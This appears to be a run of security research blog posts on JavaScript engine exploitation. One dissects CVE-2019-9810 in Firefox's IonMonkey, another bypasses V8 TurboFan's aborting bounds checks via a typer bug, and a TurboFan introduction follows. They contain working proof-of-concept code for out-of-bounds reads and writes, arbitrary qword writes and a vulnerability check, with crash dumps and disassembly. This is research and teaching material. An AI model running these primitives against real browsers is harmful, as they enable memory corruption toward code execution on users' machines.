00002b0a`9d08f1f8  2f2f2f2f`2f2f2f2f
00002b0a`9d08f200  2f2f2f2f`2f2f2f2f
00002b0a`9d08f208  2f2f2f2f`2f2f2f2f
00002b0a`9d08f210  2f2f2f2f`2f2f2f2f
00002b0a`9d08f218  2f2f2f2f`2f2f2f2f

So one way to get the interpreter to crash reliably is to overwrite its elements_ pointer with a js::Value. This is guaranteed to crash the interpreter when it tries to collect the elements_ buffer, as it won't even be a valid pointer. This field is reachable with the index 9, so we just have to modify this line:

    Target(Snowflake, 0x9, 0xBB);

And tada:

(d0.348c): Access violation - code c0000005 (!!! second chance !!!)
js!js::gc::Arena::finalize<JSObject>+0x12e:
00007ff6`e601eb2e 8b43f0          mov     eax,dword ptr [rbx-10h] ds:fff88000`000000ab=????????

0:000> kc
 # Call Site
00 js!js::gc::Arena::finalize<JSObject>
01 js!FinalizeTypedArenas<JSObject>
02 js!FinalizeArenas
03 js!js::gc::ArenaLists::backgroundFinalize
04 js!js::gc::GCRuntime::sweepBackgroundThings
05 js!js::gc::GCRuntime::sweepFromBackgroundThread
06 js!js::GCParallelTaskHelper<js::gc::BackgroundSweepTask>::runTaskTyped
07 js!js::GCParallelTask::runFromMainThread
08 js!js::GCParallelTask::joinAndRunFromMainThread
09 js!js::gc::GCRuntime::endSweepingSweepGroup
0a js!sweepaction::SweepActionSequence<js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0b js!sweepaction::SweepActionRepeatFor<js::gc::SweepGroupsIter,JSRuntime *,js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0c js!js::gc::GCRuntime::performSweepActions
0d js!js::gc::GCRuntime::incrementalSlice
0e js!js::gc::GCRuntime::gcCycle
0f js!js::gc::GCRuntime::collect
10 js!js::gc::GCRuntime::gc
11 js!JSRuntime::destroyRuntime
12 js!js::DestroyContext
13 js!main

Simplifying the PoC

OK, with all the internal knowledge we have gone through, we understand enough of the pieces at play to simplify the PoC. It's always good to verify assumptions in practice, so it'll be a good exercise to see if what we learned above sticks.

First, we do not need an array of size 0x7e. Because the corruption target we identified above is reachable at index 0x20 (remember, it's the neighboring array's elements_ field), the array only needs to be able to store 0x21 elements. This is just to satisfy the boundscheck before we shrink it.

We also know that the only role the 0x30 index constant has been serving is to make sure that the first 0x30 elements of the array are properly initialized. As the boundscheck operates against the initializedLength of the array, accessing a higher index takes a bailout. An easy way to not worry about this at all is to initialize the array entirely, with a .fill(0) for example. Once this is done, we can use 0 instead of 0x30 for the first index.
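
As a quick illustration of that initializedLength behaviour (a standalone sketch, not part of the PoC):

// Sketch: the boundscheck operates on initializedLength, not length.
let A = new Array(0x21); // length = 0x21, initializedLength = 0
A[0] = 1;                // initializedLength grows to 1
// In Ion-compiled code, accessing A[5] here (index > initializedLength)
// takes a bailout instead of the fast path...
A.fill(0);               // ...while this initializes all 0x21 slots at once.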

After all the modifications this is what you end up with:

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x21);
    Arr.fill(0);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBB);
}

main();

Conclusion

I had wanted to look at IonMonkey for quite some time and this was a good opportunity (and a good spot to stop for now!). We have covered quite a bit of content, but obviously the engine is even more complicated and there are a bunch of things I haven't really studied yet.

At least we have uncovered the secrets of CVE-2019-9810 and its PoC, as well as developed a few more commands for sm.js. For those interested in the exploit, you can find it here: CVE-2019-9810. It exploits Firefox on Windows 64-bit and loads a reflective DLL that embeds the payload. The payload infects the other tabs and sets up a hook to inject arbitrary JavaScript. The demo payload changes the background of every visited website to the blog's background theme, as well as redirecting every link to doar-e.github.io :).

If this was interesting for you, you might want to have a look at those other good resources concerning IonMonkey:

As usual, big up to my mates @yrp604 and @__x86 for proofreading this article.

And if you want a bit more, what follows is a bunch of extra questions you might have asked yourself while reading, which I answer (but which did not really fit the overall narrative), as well as a few puzzles if you want to explore Ion even more!

Little puzzles & extra quests

As said above, here are a bunch of extra questions / puzzles that did not really fit in the narrative. This doesn't mean they are not interesting, so I just decided to stuff them here :).

Why does AccessArray(10) trigger a bailout?

let Arr = null;
function AccessArray(Idx) {
    Arr[Idx] = 0xaaaaaaaa;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
    AccessArray(1);
}

AccessArray(10);

Can the out-of-bounds write be transformed into an information disclosure?

It can! We can abuse the loadelement MIR instruction the same way we abused storeelement, in which case we can read out-of-bounds memory.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
    Arr[Idx];
    Special.slice();
    return Arr[Idx];
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    Arr.fill(0);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x0);
    }

    Trigger = true;
    print(Target(Snowflake, 0x6));
}

main();

What's a good way to check if the engine is vulnerable?

The most reliable way I found to check whether the engine is vulnerable is to actually use the vulnerability as an out-of-bounds read. At this point, there are two possible outcomes: correct execution returns undefined as the array has a size of 0, or you read leftover data, in which case the engine is vulnerable.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
    Arr[Idx];
    Special.slice();
    return Arr[Idx];
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7);
    Arr.fill(1337);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x0);
    }

    Trigger = true;
    const Ret = Target(Snowflake, 0x5);
    if(Ret === undefined) {
        print(':( not vulnerable');
    } else {
        print(':) vulnerable');
    }
}

main();

Can you write something bigger than a simple uint32?

In the blogpost, we focused on the integer js::Value out-of-bounds write, but you can also use the bug to store an arbitrary qword. Here is an example writing 0x44332211deadbeef!

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
    Arr[Idx] = 4e-324;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x21);
    Arr.fill(0);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0, 5e-324);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 352943125510189150000);
}

main();
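
In case you are wondering where the 352943125510189150000 constant comes from: it is simply the double whose IEEE-754 bit pattern is 0x44332211deadbeef. A quick way to compute such a constant from any JS shell:

// View the qword 0x44332211deadbeef as an IEEE-754 double
// (little-endian host assumed; print is the shell's output function).
const Buf = new ArrayBuffer(8);
const F64 = new Float64Array(Buf);
const U32 = new Uint32Array(Buf);
U32[0] = 0xdeadbeef; // low dword
U32[1] = 0x44332211; // high dword
print(F64[0]);       // 352943125510189150000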

And here is the crash you should get eventually:

(e08.36ac): Access violation - code c0000005 (!!! second chance !!!)
mozglue!arena_dalloc+0x11:
00007ffc`773323a1 488b3e          mov     rdi,qword ptr [rsi] ds:44332211`dea00000=????????????????

0:000> dv /v aPtr
@rcx                         aPtr = 0x44332211`deadbeef

Why does using 0xdeadbeef as a value trigger a bailout?

let Arr = null;
function AccessArray(Idx, Value) {
    Arr[Idx] = Value;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
    AccessArray(1, 0xaa);
}

AccessArray(1, 0xdead);
print('dead worked!');
AccessArray(1, 0xdeadbeef);

Circumventing Chrome's hardening of typer bugs

Introduction

Some recent Chrome exploits took advantage of Bounds-Check-Elimination to get a R/W primitive out of a TurboFan typer bug (a bug that incorrectly computes type information during code optimization). Indeed, during the simplified lowering phase, when visiting a CheckBounds node, if the engine can guarantee that the used index is always in-bounds, then the CheckBounds is considered redundant and thus removed. I explained this in my previous article. Recently, TurboFan introduced a change that adds aborting bounds checks, which means that CheckBounds nodes will never get removed during simplified lowering. As mentioned by Mark Brand's article on the Google Project Zero blog and by tsuro in his zer0con talk, this could be problematic for exploitation. This short post discusses the hardening change and how to exploit typer bugs against the latest versions of v8. As an example, I provide a sample exploit that works on v8 7.5.0.

Introduction of aborting bound checks

Aborting bounds checks have been introduced by the following commit:

commit 7bb6dc0e06fa158df508bc8997f0fce4e33512a5
Author: Jaroslav Sevcik <jarin@chromium.org>
Date:   Fri Feb 8 16:26:18 2019 +0100

    [turbofan] Introduce aborting bounds checks.

    Instead of eliminating bounds checks based on types, we introduce
    an aborting bounds check that crashes rather than deopts.

    Bug: v8:8806
    Change-Id: Icbd9c4554b6ad20fe4135b8622590093679dac3f
    Reviewed-on: https://chromium-review.googlesource.com/c/1460461
    Commit-Queue: Jaroslav Sevcik <jarin@chromium.org>
    Reviewed-by: Tobias Tebbi <tebbi@chromium.org>
    Cr-Commit-Position: refs/heads/master@{#59467}

Simplified lowering

First, what has changed is the CheckBounds node visitor of simplified-lowering.cc:

  void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
    CheckParameters const& p = CheckParametersOf(node->op());
    Type const index_type = TypeOf(node->InputAt(0));
    Type const length_type = TypeOf(node->InputAt(1));
    if (length_type.Is(Type::Unsigned31())) {
      if (index_type.Is(Type::Integral32OrMinusZero())) {
        // Map -0 to 0, and the values in the [-2^31,-1] range to the
        // [2^31,2^32-1] range, which will be considered out-of-bounds
        // as well, because the {length_type} is limited to Unsigned31.
        VisitBinop(node, UseInfo::TruncatingWord32(),
                   MachineRepresentation::kWord32);
        if (lower()) {
          CheckBoundsParameters::Mode mode =
              CheckBoundsParameters::kDeoptOnOutOfBounds;
          if (lowering->poisoning_level_ ==
                  PoisoningMitigationLevel::kDontPoison &&
              (index_type.IsNone() || length_type.IsNone() ||
               (index_type.Min() >= 0.0 &&
                index_type.Max() < length_type.Min()))) {
            // The bounds check is redundant if we already know that
            // the index is within the bounds of [0.0, length[.
            mode = CheckBoundsParameters::kAbortOnOutOfBounds;         // [1]
          }
          NodeProperties::ChangeOp(
              node, simplified()->CheckedUint32Bounds(p.feedback(), mode)); // [2]
        }
// [...]
  }

Before the commit, when condition [1] was met, the bounds check would simply have been removed via a call to DeferReplacement(node, node->InputAt(0));. Now, what happens instead is that the node gets lowered to a CheckedUint32Bounds with an AbortOnOutOfBounds mode [2].

Effect linearization

When the effect control linearizer (one of the optimization phases) kicks in, here is how the CheckedUint32Bounds gets lowered:

Node* EffectControlLinearizer::LowerCheckedUint32Bounds(Node* node,
                                                        Node* frame_state) {
  Node* index = node->InputAt(0);
  Node* limit = node->InputAt(1);
  const CheckBoundsParameters& params = CheckBoundsParametersOf(node->op());

  Node* check = __ Uint32LessThan(index, limit);
  switch (params.mode()) {
    case CheckBoundsParameters::kDeoptOnOutOfBounds:
      __ DeoptimizeIfNot(DeoptimizeReason::kOutOfBounds,
                         params.check_parameters().feedback(), check,
                         frame_state, IsSafetyCheck::kCriticalSafetyCheck);
      break;
    case CheckBoundsParameters::kAbortOnOutOfBounds: {
      auto if_abort = __ MakeDeferredLabel();
      auto done = __ MakeLabel();

      __ Branch(check, &done, &if_abort);

      __ Bind(&if_abort);
      __ Unreachable();
      __ Goto(&done);

      __ Bind(&done);
      break;
    }
  }

  return index;
}

Long story short, the CheckedUint32Bounds is replaced by an Uint32LessThan node (plus the index and limit nodes). In the out-of-bounds case, there is no deoptimization possible; instead, we reach an Unreachable node.

During instruction selection Unreachable nodes are replaced by breakpoint opcodes.

void InstructionSelector::VisitUnreachable(Node* node) {
  OperandGenerator g(this);
  Emit(kArchDebugBreak, g.NoOutput());
}

Experimenting

Ordinary behaviour

Let's first experiment with some normal behaviour in order to get a grasp of what happens with bound checking. Consider the following code.

var opt_me = () => {
  let arr = [1,2,3,4];
  let badly_typed = 0;
  let idx = badly_typed * 5;
  return arr[idx];
};
opt_me();
%OptimizeFunctionOnNextCall(opt_me);
opt_me();

With this example, we're going to observe a few things:

  • simplified lowering does not remove the CheckBounds node as it would have before,
  • the lowering of this node and how it leads to the creation of an Unreachable node,
  • eventually, bound checking will get completely removed (which is correct and expected).

Typing of a CheckBounds

Without surprise, a CheckBounds node is generated and gets a type of Range(0,0) during the typer phase.

[figure: the CheckBounds node typed as Range(0,0) during the typer phase]

CheckBounds lowering to CheckedUint32Bounds

The CheckBounds node is not removed during simplified lowering the way it would have been before. It is lowered to a CheckedUint32Bounds instead.

[figure: CheckBounds lowered to CheckedUint32Bounds during simplified lowering]

Effect Linearization : CheckedUint32Bounds to Uint32LessThan with Unreachable

Let's have a look at the effect linearization.

[figure: schedule after effect linearization]

[figure: graph after effect linearization]

The CheckedUint32Bounds is replaced by several nodes. Instead of this bound checking node, there is a Uint32LessThan node that either leads to a LoadElement node or an Unreachable node.

Late optimization: MachineOperatorReducer and DeadCodeElimination

It seems pretty obvious that the Uint32LessThan can be lowered to a constant true (Int32Constant). When Uint32LessThan is replaced by a constant node, the rest of the code, including the Unreachable node, gets removed by dead code elimination. Therefore, no bound check remains and no breakpoint will ever be reached (which is correct here, since the index is provably in bounds).

// Perform constant folding and strength reduction on machine operators.
Reduction MachineOperatorReducer::Reduce(Node* node) {
  switch (node->opcode()) {
// [...]
      case IrOpcode::kUint32LessThan: {
      Uint32BinopMatcher m(node);
      if (m.left().Is(kMaxUInt32)) return ReplaceBool(false);  // M < x => false
      if (m.right().Is(0)) return ReplaceBool(false);          // x < 0 => false
      if (m.IsFoldable()) {                                    // K < K => K
        return ReplaceBool(m.left().Value() < m.right().Value());
      }
      if (m.LeftEqualsRight()) return ReplaceBool(false);  // x < x => false
      if (m.left().IsWord32Sar() && m.right().HasValue()) {
        Int32BinopMatcher mleft(m.left().node());
        if (mleft.right().HasValue()) {
          // (x >> K) < C => x < (C << K)
          // when C < (M >> K)
          const uint32_t c = m.right().Value();
          const uint32_t k = mleft.right().Value() & 0x1F;
          if (c < static_cast<uint32_t>(kMaxInt >> k)) {
            node->ReplaceInput(0, mleft.left().node());
            node->ReplaceInput(1, Uint32Constant(c << k));
            return Changed(node);
          }
          // TODO(turbofan): else the comparison is always true.
        }
      }
      break;
    }
// [...]

[figure: Uint32LessThan constant-folded, removing the remaining bound check]

Final scheduling: no more bound checking

To observe the generated code, let's first look at the final scheduling phase and confirm that eventually, only a Load at index 0 remains.

[figure: final schedule, only a Load at index 0 remains]

Generated assembly code

In this case, TurboFan correctly understood that no bound checking was necessary and simply generated a mov instruction movq rax, [fixed_array_base + offset_to_element_0].

[figure: generated assembly, a single mov without bound checking]

To sum up:

  1. arr[good_idx] leads to the creation of a CheckBounds node in the early phases
  2. during "simplified lowering", it gets replaced by an aborting CheckedUint32Bounds
  3. The CheckedUint32Bounds gets replaced by several nodes during "effect linearization" : Uint32LessThan and Unreachable
  4. Uint32LessThan is constant folded during the "Late Optimization" phase
  5. The Unreachable node is removed during dead code elimination of the "Late Optimization" phase
  6. Only a simple Load remains during the final scheduling
  7. Generated assembly is a simple mov instruction without bound checking

Typer bug

Let's consider the String#lastIndexOf bug where the typing of kStringIndexOf and kStringLastIndexOf is incorrect. The computed type is Type::Range(-1.0, String::kMaxLength - 1.0, t->zone()) instead of Type::Range(-1.0, String::kMaxLength, t->zone()). This is incorrect because both String#indexOf and String#lastIndexOf can return a value of kMaxLength. You can find more details about this bug on my github.

This bug is exploitable even with the introduction of aborting bound checks. So let's reintroduce it on v8 7.5 and exploit it.

In summary, if we use lastIndexOf on a string of length kMaxLength, the maximum of the computed Range type will be kMaxLength - 1 while the actual return value can be kMaxLength.

const str = "____"+"DOARE".repeat(214748359);
String.prototype.lastIndexOf.call(str, ''); // typed as kMaxLength-1 instead of kMaxLength

We can then amplify this typing error.

  let badly_typed = String.prototype.lastIndexOf.call(str, '');
  badly_typed = Math.abs(Math.abs(badly_typed) + 25);
  badly_typed = badly_typed >> 30; // type is Range(0,0) instead of Range(1,1)
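
To see why the shift amplifies the off-by-one, here is the endpoint arithmetic (this assumes String.kMaxLength is 2**30 - 25 on this build, which matches the string constructed above):

// Actual runtime value: lastIndexOf returns kMaxLength = 2**30 - 25.
Math.abs(Math.abs(2**30 - 25) + 25) >> 30; // == 1
// Maximum according to the typer: kMaxLength - 1 = 2**30 - 26.
Math.abs(Math.abs(2**30 - 26) + 25) >> 30; // == 0, hence Range(0,0)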

If all of this seems unclear, check my previous introduction to TurboFan and my github.

Now, consider the following trigger PoC:

SUCCESS = 0;
FAILURE = 0x42;

const str = "____"+"DOARE".repeat(214748359);

let it = 0;

var opt_me = () => {
  const OOB_OFFSET = 5;

  let badly_typed = String.prototype.lastIndexOf.call(str, '');
  badly_typed = Math.abs(Math.abs(badly_typed) + 25);
  badly_typed = badly_typed >> 30;

  let bad = badly_typed * OOB_OFFSET;
  let leak = 0;

  if (bad >= OOB_OFFSET && ++it < 0x10000) {
    leak = 0;
  }
  else {
    let arr = new Array(1.1,1.1);
    arr2 = new Array({},{});
    leak = arr[bad];
    if (leak != undefined) {
      return leak;
    }
  }
  return FAILURE;
};

let res = opt_me();
for (let i = 0; i < 0x10000; ++i)
  res = opt_me();
%DisassembleFunction(opt_me); // prints nothing on release builds
for (let i = 0; i < 0x10000; ++i)
  res = opt_me();
print(res);
%DisassembleFunction(opt_me); // prints nothing on release builds

Check out the result:

$ d8 poc.js
1.5577100569205e-310

It worked despite those aborting bound checks. Why? The line leak = arr[bad] didn’t lead to any CheckBounds elimination and yet we didn't execute any Unreachable node (aka breakpoint instruction).

Native context specialization of an element access

The answer lies in the native context specialization. This is one of the early optimization phases, where the compiler is given the opportunity to specialize code in a way that capitalizes on its knowledge of the context in which the code will execute.

One of the first optimization phases is the inlining phase, which includes native context specialization. For element accesses, the context specialization is done in JSNativeContextSpecialization::BuildElementAccess.

There is one case that looks very interesting: when the load_mode is LOAD_IGNORE_OUT_OF_BOUNDS.

    } else if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&
               CanTreatHoleAsUndefined(receiver_maps)) {
      // Check that the {index} is a valid array index, we do the actual
      // bounds check below and just skip the store below if it's out of
      // bounds for the {receiver}.
      index = effect = graph()->NewNode(
          simplified()->CheckBounds(VectorSlotPair()), index,
          jsgraph()->Constant(Smi::kMaxValue), effect, control);
    } else {

In this case, the CheckBounds node checks the index against a length of Smi::kMaxValue.

The actual bound checking nodes are added as follows:

      if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&
          CanTreatHoleAsUndefined(receiver_maps)) {
        Node* check =
            graph()->NewNode(simplified()->NumberLessThan(), index, length);       // [1]
        Node* branch = graph()->NewNode(
            common()->Branch(BranchHint::kTrue,
                             IsSafetyCheck::kCriticalSafetyCheck),
            check, control);

        Node* if_true = graph()->NewNode(common()->IfTrue(), branch);              // [2]
        Node* etrue = effect;
        Node* vtrue;
        {
          // Perform the actual load
          vtrue = etrue =
              graph()->NewNode(simplified()->LoadElement(element_access),          // [3]
                               elements, index, etrue, if_true);

        // [...]
        }

      // [...]
      }

In a nutshell, with this mode:

  • CheckBounds checks the index against Smi::kMaxValue (0x7FFFFFFF),
  • A NumberLessThan node is generated,
  • An IfTrue node is generated,
  • In the "true" branch, there will be a LoadElement node.

The length used by the NumberLessThan node comes from a previously generated LoadField:

    Node* length = effect =
        receiver_is_jsarray
            ? graph()->NewNode(
                  simplified()->LoadField(
                      AccessBuilder::ForJSArrayLength(elements_kind)),
                  receiver, effect, control)
            : graph()->NewNode(
                  simplified()->LoadField(AccessBuilder::ForFixedArrayLength()),
                  elements, effect, control);

All of this means that TurboFan does generate some bounds-checking nodes, but there won't be any aborting bounds check because of the Smi::kMaxValue length being used (well, technically there is one, but its limit is unlikely to ever be reached!).
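
As a side note, this load mode is not the default: LOAD_IGNORE_OUT_OF_BOUNDS gets selected when the feedback for the element access has already observed out-of-bounds loads. Here is a hedged sketch of how such feedback can be trained (names are made up):

// Repeated OOB reads returning undefined make the keyed load IC record an
// out-of-bounds-tolerant mode, which TurboFan then specializes as described.
function load_elem(arr, i) { return arr[i]; }
const A = [1.1, 2.2];
for (let i = 0; i < 0x10000; ++i) {
  load_elem(A, 0); // in-bounds
  load_elem(A, 4); // out-of-bounds, yields undefined
}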

Type narrowing and constant folding of NumberLessThan

After the typer phase, the sea of nodes contains a NumberLessThan that compares a badly typed value to the correct array length. This is interesting because the TypeNarrowingReducer is going to change the type [2] to op_typer_.singleton_true() [1].

    case IrOpcode::kNumberLessThan: {
      // TODO(turbofan) Reuse the logic from typer.cc (by integrating relational
      // comparisons with the operation typer).
      Type left_type = NodeProperties::GetType(node->InputAt(0));
      Type right_type = NodeProperties::GetType(node->InputAt(1));
      if (left_type.Is(Type::PlainNumber()) &&
          right_type.Is(Type::PlainNumber())) {
        if (left_type.Max() < right_type.Min()) {
          new_type = op_typer_.singleton_true();              // [1]
        } else if (left_type.Min() >= right_type.Max()) {
          new_type = op_typer_.singleton_false();
        }
      }   
      break;
    }   
  // [...]
  Type original_type = NodeProperties::GetType(node);
  Type restricted = Type::Intersect(new_type, original_type, zone());
  if (!original_type.Is(restricted)) {
    NodeProperties::SetType(node, restricted);                 // [2]
    return Changed(node);
  } 

Thanks to that, the ConstantFoldingReducer will then simply remove the NumberLessThan node and replace it by a HeapConstant node.

Reduction ConstantFoldingReducer::Reduce(Node* node) {
  DisallowHeapAccess no_heap_access;
  // Check if the output type is a singleton.  In that case we already know the
  // result value and can simply replace the node if it's eliminable.
  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&
      node->op()->HasProperty(Operator::kEliminatable)) {
    // TODO(v8:5303): We must not eliminate FinishRegion here. This special
    // case can be removed once we have separate operators for value and
    // effect regions.
    if (node->opcode() == IrOpcode::kFinishRegion) return NoChange();
    // We can only constant-fold nodes here, that are known to not cause any
    // side-effect, may it be a JavaScript observable side-effect or a possible
    // eager deoptimization exit (i.e. {node} has an operator that doesn't have
    // the Operator::kNoDeopt property).
    Type upper = NodeProperties::GetType(node);
    if (!upper.IsNone()) {
      Node* replacement = nullptr;
      if (upper.IsHeapConstant()) {
        replacement = jsgraph()->Constant(upper.AsHeapConstant()->Ref());
      } else if (upper.Is(Type::MinusZero())) {
        Factory* factory = jsgraph()->isolate()->factory();
        ObjectRef minus_zero(broker(), factory->minus_zero_value());
        replacement = jsgraph()->Constant(minus_zero);
      } else if (upper.Is(Type::NaN())) {
        replacement = jsgraph()->NaNConstant();
      } else if (upper.Is(Type::Null())) {
        replacement = jsgraph()->NullConstant();
      } else if (upper.Is(Type::PlainNumber()) && upper.Min() == upper.Max()) {
        replacement = jsgraph()->Constant(upper.Min());
      } else if (upper.Is(Type::Undefined())) {
        replacement = jsgraph()->UndefinedConstant();
      }   
      if (replacement) {
        // Make sure the node has a type.
        if (!NodeProperties::IsTyped(replacement)) {
          NodeProperties::SetType(replacement, upper);
        }
        ReplaceWithValue(node, replacement);
        return Changed(replacement);
      }   
    }
  }
  return NoChange();
}

We confirm this behaviour using --trace-turbo-reduction:

- In-place update of 200: NumberLessThan(199, 225) by reducer TypeNarrowingReducer
- Replacement of 200: NumberLessThan(199, 225) with 94: HeapConstant[0x2584e3440659 <true>] by reducer ConstantFoldingReducer

At this point, there isn't any proper bound check left.

Observing the generated assembly

Let's run the previous PoC again. We'll disassemble the function twice.

The first optimized code we can observe contains code related to:

  • a CheckBounds with a length of Smi::kMaxValue,
  • a bounds check via a NumberLessThan with the correct length.
                =====   FIRST DISASSEMBLY  ===== 

0x11afad03119   119  41c1f91e       sarl r9, 30              // badly_typed >> 30
0x11afad0311d   11d  478d0c89       leal r9,[r9+r9*4]        // badly_typed * OOB_OFFSET

0x11afad03239   239  4c894de0       REX.W movq [rbp-0x20],r9

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)
0x11afad0326f   26f  817de0ffffff7f cmpl [rbp-0x20],0x7fffffff
0x11afad03276   276  0f830c010000   jnc 0x11afad03388  <+0x388> // go to Unreachable

// NumberLessThan (badly_typed, LoadField(array.length) = 2)
0x11afad0327c   27c  837de002       cmpl [rbp-0x20],0x2
0x11afad03280   280  0f8308010000   jnc 0x11afad0338e  <+0x38e>

// LoadElement
0x11afad03286   286  4c8b45e8       REX.W movq r8,[rbp-0x18]  // FixedArray
0x11afad0328a   28a  4c8b4de0       REX.W movq r9,[rbp-0x20]  // badly_typed * OOB_OFFSET
0x11afad0328e   28e  c4817b1044c80f vmovsd xmm0,[r8+r9*8+0xf] // arr[bad]

// Unreachable
0x11afad03388   388  cc             int3l // Unreachable node

The second disassembly is much more interesting. Indeed, only the code corresponding to the CheckBounds remains. The actual bound check was removed!

                     =====  SECOND DISASSEMBLY  ===== 

335 0x2e987c30412f   10f  c1ff1e         sarl rdi, 30 // badly_typed >> 30
336 0x2e987c304132   112  4c8d4120       REX.W leaq r8,[rcx+0x20]
337 0x2e987c304136   116  8d3cbf         leal rdi,[rdi+rdi*4] // badly_typed * OOB_OFFSET

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)
400 0x2e987c304270   250  81ffffffff7f   cmpl rdi,0x7fffffff
401 0x2e987c304276   256  0f83b9000000   jnc 0x2e987c304335  <+0x315>
402 0x2e987c30427c   25c  c5fb1044f90f   vmovsd xmm0,[rcx+rdi*8+0xf] // unchecked access!

441 0x2e987c304335   315  cc             int3l  // Unreachable node

You can confirm it works by launching the full exploit on a 7.5 d8 shell patched to reintroduce the bug.

Conclusion

As discussed in this article, the introduction of aborting CheckBounds essentially kills the CheckBounds-elimination technique for typer bug exploitation. However, we demonstrated a case where TurboFan defers the bounds checking to a NumberLessThan node, which then gets incorrectly constant-folded because of the bad typing.

Thanks for reading this. Please feel free to shoot me any feedback via my twitter: @__x86.

Special thanks to my friends Axel Souchet, yrp604 and Georgi Geshev for their review.

Also, if you're interested in TurboFan, don't miss my upcoming TyphoonCon talk!

A bit before this post was published, saelo released a new Phrack article on JIT exploitation, as well as the slides of his 0x41con talk.

Introduction to TurboFan

Introduction

Ages ago I wrote a blog post here called First dip in the kernel pool; this year, we're going to swim in a sea of nodes!

The current trend is to attack JavaScript engines and more specifically, optimizing JIT compilers such as V8's TurboFan, SpiderMonkey's IonMonkey, JavaScriptCore's Data Flow Graph (DFG) & Faster Than Light (FTL) or Chakra's Simple JIT & FullJIT.

In this article we're going to discuss TurboFan and play along with the sea of nodes structure it uses.

Then, we'll study a vulnerable optimization pass written by @_tsuro for Google's CTF 2018 and write an exploit for it. We’ll be doing that on a x64 Linux box but it really is the exact same exploitation for Windows platforms (simply use a different shellcode!).

If you want to follow along, you can check out the associated repo.

Setup

Building v8

Building v8 is very easy. You can simply fetch the sources using depot tools and then build using the following commands:

fetch v8
gclient sync
./build/install-build-deps.sh
tools/dev/gm.py x64.release

Please note that whenever you're updating the sources or checking out a specific commit, do gclient sync or you might be unable to build properly.

The d8 shell

A very convenient shell called d8 is provided with the engine. For faster builds, limit the compilation to this shell:

~/v8$  ./tools/dev/gm.py x64.release d8

Try it:

~/v8$ ./out/x64.release/d8 
V8 version 7.3.0 (candidate)
d8> print("hello doare")
hello doare

Many interesting flags are available. List them using d8 --help.

In particular, v8 comes with runtime functions that you can call from JavaScript using the % prefix. To enable this syntax, you need to use the flag --allow-natives-syntax. Here is an example:

$ d8 --allow-natives-syntax
V8 version 7.3.0 (candidate)
d8> let a = new Array('d','o','a','r','e')
undefined
d8> %DebugPrint(a)
DebugPrint: 0x37599d40aee1: [JSArray]
 - map: 0x01717e082d91 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x39ea1928fdb1 <JSArray[0]>
 - elements: 0x37599d40af11 <FixedArray[5]> [PACKED_ELEMENTS]
 - length: 5
 - properties: 0x0dfc80380c19 <FixedArray[0]> {
    #length: 0x3731486801a1 <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x37599d40af11 <FixedArray[5]> {
           0: 0x39ea1929d8d9 <String[#1]: d>
           1: 0x39ea1929d8f1 <String[#1]: o>
           2: 0x39ea1929d8c1 <String[#1]: a>
           3: 0x39ea1929d909 <String[#1]: r>
           4: 0x39ea1929d921 <String[#1]: e>
 }
0x1717e082d91: [Map]
 - type: JS_ARRAY_TYPE
 - instance size: 32
 - inobject properties: 0
 - elements kind: PACKED_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - back pointer: 0x01717e082d41 <Map(HOLEY_DOUBLE_ELEMENTS)>
 - prototype_validity cell: 0x373148680601 <Cell value= 1>
 - instance descriptors #1: 0x39ea192909f1 <DescriptorArray[1]>
 - layout descriptor: (nil)
 - transitions #1: 0x39ea192909c1 <TransitionArray[4]>Transition array #1:
     0x0dfc80384b71 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_ELEMENTS) -> 0x01717e082de1 <Map(HOLEY_ELEMENTS)>
 - prototype: 0x39ea1928fdb1 <JSArray[0]>
 - constructor: 0x39ea1928fb79 <JSFunction Array (sfi = 0x37314868ab01)>
 - dependent code: 0x0dfc803802b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
 - construction counter: 0

["d", "o", "a", "r", "e"]

If you want to know about existing runtime functions, simply go to src/runtime/ and grep on all the RUNTIME_FUNCTION (this is the macro used to declare a new runtime function).

Preparing Turbolizer

Turbolizer is a tool that we are going to use to debug TurboFan's sea of nodes graph.

cd tools/turbolizer
npm i
npm run-script build
python -m SimpleHTTPServer

